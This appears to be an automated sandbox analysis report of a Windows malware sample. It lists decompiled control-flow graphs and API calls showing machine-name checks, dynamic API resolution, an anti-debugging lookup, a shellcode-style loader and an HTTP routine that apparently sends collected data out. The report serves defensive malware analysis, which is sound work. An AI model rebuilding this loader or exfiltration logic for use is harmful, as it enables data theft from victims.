lstrcpy 27788->27789 27790 404bbe 27789->27790 27791 41a9b0 4 API calls 27790->27791 27792 404bde 27791->27792 27793 41a8a0 lstrcpy 27792->27793 27794 404be7 27793->27794 27795 41a9b0 4 API calls 27794->27795 27796 404c06 27795->27796 27797 41a8a0 lstrcpy 27796->27797 27798 404c0f 27797->27798 27935 41a920 lstrcpy lstrcpy lstrcatA 27798->27935 27800 404c2d 27801 41a8a0 lstrcpy 27800->27801 27802 404c36 27801->27802 27803 41a9b0 4 API calls 27802->27803 27804 404c55 27803->27804 27805 41a8a0 lstrcpy 27804->27805 27806 404c5e 27805->27806 27807 41a9b0 4 API calls 27806->27807 27808 404c7d 27807->27808 27809 41a8a0 lstrcpy 27808->27809 27810 404c86 27809->27810 27936 41a920 lstrcpy lstrcpy lstrcatA 27810->27936 27812 404ca4 27813 41a8a0 lstrcpy 27812->27813 27814 404cad 27813->27814 27815 41a9b0 4 API calls 27814->27815 27816 404ccc 27815->27816 27817 41a8a0 lstrcpy 27816->27817 27818 404cd5 27817->27818 27819 41a9b0 4 API calls 27818->27819 27820 404cf6 27819->27820 27821 41a8a0 lstrcpy 27820->27821 27822 404cff 27821->27822 27823 41a9b0 4 API calls 27822->27823 27824 404d1f 27823->27824 27825 41a8a0 lstrcpy 27824->27825 27826 404d28 27825->27826 27827 41a9b0 4 API calls 27826->27827 27828 404d47 27827->27828 27829 41a8a0 lstrcpy 27828->27829 27830 404d50 27829->27830 27937 41a920 lstrcpy lstrcpy lstrcatA 27830->27937 27832 404d6e 27833 41a8a0 lstrcpy 27832->27833 27834 404d77 27833->27834 27835 41a740 lstrcpy 27834->27835 27836 404d92 27835->27836 27938 41a920 lstrcpy lstrcpy lstrcatA 27836->27938 27838 404db3 27939 41a920 lstrcpy lstrcpy lstrcatA 27838->27939 27840 404dba 27841 41a8a0 lstrcpy 27840->27841 27842 404dc6 27841->27842 27843 404de7 lstrlenA 27842->27843 27844 404dfa 27843->27844 27845 404e03 lstrlenA 27844->27845 27940 41aad0 27845->27940 27847 404e13 HttpSendRequestA 27848 404e32 InternetReadFile 27847->27848 27849 404e67 InternetCloseHandle 27848->27849 27854 404e5e 27848->27854 27852 41a800 27849->27852 27851 41a9b0 4 API calls 27851->27854 27852->27774 27853 41a8a0 lstrcpy 27853->27854 27854->27848 27854->27849 27854->27851 27854->27853 27945 41aad0 27855->27945 27857 4117c4 StrCmpCA 27858 4117d7 27857->27858 27859 4117cf ExitProcess 27857->27859 27860 4117e7 strtok_s 27858->27860 27872 4117f4 27860->27872 27861 41199e strtok_s 27861->27872 27862 4118ad StrCmpCA 27862->27872 27863 4118cf StrCmpCA 27863->27872 27864 4118f1 StrCmpCA 27864->27872 27865 411951 StrCmpCA 27865->27872 27866 411970 StrCmpCA 27866->27872 27867 411913 StrCmpCA 27867->27872 27868 411932 StrCmpCA 27868->27872 27869 41185d StrCmpCA 27869->27872 27870 41187f StrCmpCA 27870->27872 27871 4119c2 27871->26778 27872->27861 27872->27862 27872->27863 27872->27864 27872->27865 27872->27866 27872->27867 27872->27868 27872->27869 27872->27870 27872->27871 27873 41a820 lstrlenA lstrcpy 27872->27873 27874 41a820 2 API calls 27872->27874 27873->27872 27874->27861 27875->26784 27876->26786 27877->26792 27878->26794 27879->26800 27880->26802 27881->26806 27882->26810 27883->26814 27884->26820 27885->26822 27886->26826 27887->26840 27888->26844 27889->26843 27890->26839 27891->26843 27892->26858 27893->26847 27894->26849 27895->26852 27896->26855 27897->26860 27898->26867 27899->26870 27900->26876 27901->26897 27902->26901 27903->26900 27904->26896 27905->26900 27906->26910 27909 41a7a0 lstrcpy 27908->27909 27910 401683 27909->27910 27911 41a7a0 lstrcpy 27910->27911 27912 401695 27911->27912 27913 41a7a0 lstrcpy 27912->27913 27914 4016a7 27913->27914 27915 41a7a0 lstrcpy 27914->27915 27916 4015a3 27915->27916 27916->27636 27941 401030 27917->27941 27921 404838 lstrlenA 27944 41aad0 27921->27944 27923 404848 InternetCrackUrlA 27924 404867 27923->27924 27924->27713 27926 409af9 LocalAlloc 27925->27926 27927 404eee 27925->27927 27926->27927 27928 409b14 CryptStringToBinaryA 27926->27928 27927->27735 27927->27738 27928->27927 27929 409b39 LocalFree 27928->27929 27929->27927 27930->27729 27931->27733 27932->27752 27933->27767 27934->27780 27935->27800 27936->27812 27937->27832 27938->27838 27939->27840 27940->27847 27942 40103a ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 27941->27942 27943 41aad0 27942->27943 27943->27921 27944->27923 27945->27857 28077 416ab1 880 API calls 28035 4069f3 7 API calls 28079 41cafe 219 API calls 5 library calls 28017 2d015b3 18 API calls ctype 28039 2d012eb strtok_s lstrlen lstrcpy 27961 2cf0005 27966 2cf092b GetPEB 27961->27966 27963 2cf0030 27967 2cf003c 27963->27967 27966->27963 27968 2cf0049 27967->27968 27982 2cf0e0f SetErrorMode SetErrorMode 27968->27982 27973 2cf0265 27974 2cf02ce VirtualProtect 27973->27974 27976 2cf030b 27974->27976 27975 2cf0439 VirtualFree 27979 2cf05f4 LoadLibraryA 27975->27979 27981 2cf04be 27975->27981 27976->27975 27977 2cf04e3 LoadLibraryA 27977->27981 27980 2cf08c7 27979->27980 27981->27977 27981->27979 27983 2cf0223 27982->27983 27984 2cf0d90 27983->27984 27985 2cf0dad 27984->27985 27986 2cf0dbb GetPEB 27985->27986 27987 2cf0238 VirtualAlloc 27985->27987 27986->27987 27987->27973 26517 401190 26524 4178e0 GetProcessHeap HeapAlloc GetComputerNameA 26517->26524 26519 40119e 26520 4011cc 26519->26520 26526 417850 GetProcessHeap HeapAlloc GetUserNameA 26519->26526 26522 4011b7 26522->26520 26523 4011c4 ExitProcess 26522->26523 26525 417939 26524->26525 26525->26519 26527 4178c3 26526->26527 26527->26522 27946 2e8963e 27947 2e8964d 27946->27947 27950 2e89dde 27947->27950 27956 2e89df9 27950->27956 27951 2e89e02 CreateToolhelp32Snapshot 27952 2e89e1e Module32First 27951->27952 27951->27956 27953 2e89e2d 27952->27953 27955 2e89656 27952->27955 27957 2e89a9d 27953->27957 27956->27951 27956->27952 27958 2e89ac8 27957->27958 27959 2e89ad9 VirtualAlloc 27958->27959 27960 2e89b11 27958->27960 27959->27960 27960->27960 28111 2d0d106 41 API calls __amsg_exit 28020 2d06a0a ExitProcess 28081 41ce9f 69 API calls __amsg_exit 28022 4088a4 RaiseException task __CxxThrowException@8 28023 4180a5 GetProcessHeap HeapFree 28041 2cf932a ??2@YAPAXI RaiseException allocator 28082 2d01c35 110 API calls 28043 41b9b0 RtlUnwind 28044 2cf9b37 9 API calls

                                                        Control-flow Graph

                                                        APIs
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045CC
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045D7
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045E2
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045ED
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045F8
                                                        • GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,004169FB), ref: 00404607
                                                        • RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,004169FB), ref: 0040460E
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040461C
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404627
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404632
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040463D
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404648
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040465C
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404667
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404672
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040467D
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404688
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046B1
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046BC
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046C7
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046D2
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046DD
                                                        • strlen.MSVCRT ref: 004046F0
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404718
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404723
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040472E
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404739
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404744
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404754
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040475F
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040476A
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404775
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404780
                                                        • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0040479C
                                                        Strings
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040466D
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045C7
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040477B
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404678
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404683
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404713
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040475A
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045D2
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045E8
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046B7
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046C2
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404770
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045F3
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046CD
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040474F
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040462D
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404729
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404765
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040473F
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040471E
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404617
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404638
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404643
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046D8
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404734
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404657
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404622
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404662
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046AC
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045DD
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                                        • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                                        • API String ID: 2127927946-2218711628
                                                        • Opcode ID: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                                        • Instruction ID: ff82eb6acc97b20701c4bcbd3dbf8f3289274c2dbbe7f73b68b52ee208cac3fc
                                                        • Opcode Fuzzy Hash: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                                        • Instruction Fuzzy Hash: 1D419979740624EBC718AFE5FC8DB987F71AB4C712BA0C062F90296190C7B9D5119B3E

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 665 419860-419874 call 419750 668 419a93-419af2 LoadLibraryA * 5 665->668 669 41987a-419a8e call 419780 GetProcAddress * 21 665->669 670 419af4-419b08 GetProcAddress 668->670 671 419b0d-419b14 668->671 669->668 670->671 673 419b46-419b4d 671->673 674 419b16-419b41 GetProcAddress * 2 671->674 676 419b68-419b6f 673->676 677 419b4f-419b63 GetProcAddress 673->677 674->673 678 419b71-419b84 GetProcAddress 676->678 679 419b89-419b90 676->679 677->676 678->679 680 419bc1-419bc2 679->680 681 419b92-419bbc GetProcAddress * 2 679->681 681->680
                                                        APIs
                                                        • GetProcAddress.KERNEL32(75550000,02E87DD0), ref: 004198A1
                                                        • GetProcAddress.KERNEL32(75550000,02E87DE8), ref: 004198BA
                                                        • GetProcAddress.KERNEL32(75550000,02E87F38), ref: 004198D2
                                                        • GetProcAddress.KERNEL32(75550000,02E87EF0), ref: 004198EA
                                                        • GetProcAddress.KERNEL32(75550000,02E87E90), ref: 00419903
                                                        • GetProcAddress.KERNEL32(75550000,02EB5D18), ref: 0041991B
                                                        • GetProcAddress.KERNEL32(75550000,02E828D8), ref: 00419933
                                                        • GetProcAddress.KERNEL32(75550000,02E82878), ref: 0041994C
                                                        • GetProcAddress.KERNEL32(75550000,02E87E78), ref: 00419964
                                                        • GetProcAddress.KERNEL32(75550000,02E87EA8), ref: 0041997C
                                                        • GetProcAddress.KERNEL32(75550000,02E87F20), ref: 00419995
                                                        • GetProcAddress.KERNEL32(75550000,02E87EC0), ref: 004199AD
                                                        • GetProcAddress.KERNEL32(75550000,02E826B8), ref: 004199C5
                                                        • GetProcAddress.KERNEL32(75550000,02E87ED8), ref: 004199DE
                                                        • GetProcAddress.KERNEL32(75550000,02E87F08), ref: 004199F6
                                                        • GetProcAddress.KERNEL32(75550000,02E82838), ref: 00419A0E
                                                        • GetProcAddress.KERNEL32(75550000,02EB6270), ref: 00419A27
                                                        • GetProcAddress.KERNEL32(75550000,02EB6288), ref: 00419A3F
                                                        • GetProcAddress.KERNEL32(75550000,02E82758), ref: 00419A57
                                                        • GetProcAddress.KERNEL32(75550000,02EB6168), ref: 00419A70
                                                        • GetProcAddress.KERNEL32(75550000,02E828F8), ref: 00419A88
                                                        • LoadLibraryA.KERNEL32(02EB6240,?,00416A00), ref: 00419A9A
                                                        • LoadLibraryA.KERNEL32(02EB6378,?,00416A00), ref: 00419AAB
                                                        • LoadLibraryA.KERNEL32(02EB60F0,?,00416A00), ref: 00419ABD
                                                        • LoadLibraryA.KERNEL32(02EB62D0,?,00416A00), ref: 00419ACF
                                                        • LoadLibraryA.KERNEL32(02EB6180,?,00416A00), ref: 00419AE0
                                                        • GetProcAddress.KERNEL32(75670000,02EB6258), ref: 00419B02
                                                        • GetProcAddress.KERNEL32(75750000,02EB6120), ref: 00419B23
                                                        • GetProcAddress.KERNEL32(75750000,02EB6228), ref: 00419B3B
                                                        • GetProcAddress.KERNEL32(76BE0000,02EB6390), ref: 00419B5D
                                                        • GetProcAddress.KERNEL32(759D0000,02E826D8), ref: 00419B7E
                                                        • GetProcAddress.KERNEL32(773F0000,02EB5CD8), ref: 00419B9F
                                                        • GetProcAddress.KERNEL32(773F0000,NtQueryInformationProcess), ref: 00419BB6
                                                        Strings
                                                        • NtQueryInformationProcess, xrefs: 00419BAA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AddressProc$LibraryLoad
                                                        • String ID: NtQueryInformationProcess
                                                        • API String ID: 2238633743-2781105232
                                                        • Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                                        • Instruction ID: 20ebc6b46c949eaa7f25e90fb8197bb2e58582eade08509f86bd82c1d7e4afd5
                                                        • Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                                        • Instruction Fuzzy Hash: 55A14DBD5C4240BFE354EFE8ED889963BFBF74E301704661AE605C3264D639A841DB12

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 769 404880-404942 call 41a7a0 call 4047b0 call 41a740 * 5 InternetOpenA StrCmpCA 784 404944 769->784 785 40494b-40494f 769->785 784->785 786 404955-404acd call 418b60 call 41a920 call 41a8a0 call 41a800 * 2 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a920 call 41a8a0 call 41a800 * 2 InternetConnectA 785->786 787 404ecb-404ef3 InternetCloseHandle call 41aad0 call 409ac0 785->787 786->787 873 404ad3-404ad7 786->873 796 404f32-404fa2 call 418990 * 2 call 41a7a0 call 41a800 * 8 787->796 797 404ef5-404f2d call 41a820 call 41a9b0 call 41a8a0 call 41a800 787->797 797->796 874 404ae5 873->874 875 404ad9-404ae3 873->875 876 404aef-404b22 HttpOpenRequestA 874->876 875->876 877 404b28-404e28 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a740 call 41a920 * 2 call 41a8a0 call 41a800 * 2 call 41aad0 lstrlenA call 41aad0 * 2 lstrlenA call 41aad0 HttpSendRequestA 876->877 878 404ebe-404ec5 InternetCloseHandle 876->878 989 404e32-404e5c InternetReadFile 877->989 878->787 990 404e67-404eb9 InternetCloseHandle call 41a800 989->990 991 404e5e-404e65 989->991 990->878 991->990 992 404e69-404ea7 call 41a9b0 call 41a8a0 call 41a800 991->992 992->989
                                                        APIs
